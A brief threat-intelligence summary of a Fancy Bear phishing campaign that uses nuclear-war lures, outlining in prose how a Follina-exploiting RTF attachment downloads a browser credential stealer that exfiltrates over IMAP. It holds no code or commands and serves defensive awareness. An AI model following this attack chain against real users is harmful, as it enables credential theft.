APT group Fancy Bear, a Russian nation-state threat actor that has been involved in some prolific breaches, has been seen using nuclear war lures in their latest phishing campaigns. The goal of these phishing emails is to compromise a system of the targeted individual and steal credentials from web browsers such as Google Chrome or Mozilla Firefox.
The phishing emails contain an RTF attached document that are modeled after the possibility of nuclear war in the Russian invasion of Ukraine. Upon opening, the Follina vulnerability (CVE-2022-30190) is executed to force the system to download a DLL and EXE file via PowerShell. The EXE file, which is placed in the user’s home directory, is then executed. This executable file grabs all saved user information, such as usernames and passwords, from Google Chrome, Mozilla Firefox, and Microsoft Edge before packaging it for exfiltration. Exfiltration is performed by making an IMAP email protocol connection to a command-and-control server.
Due to the targets of these phishing emails and the involvement of this Russia-based threat actor, it is believed that this campaign is likely a part of the conflict in Ukraine.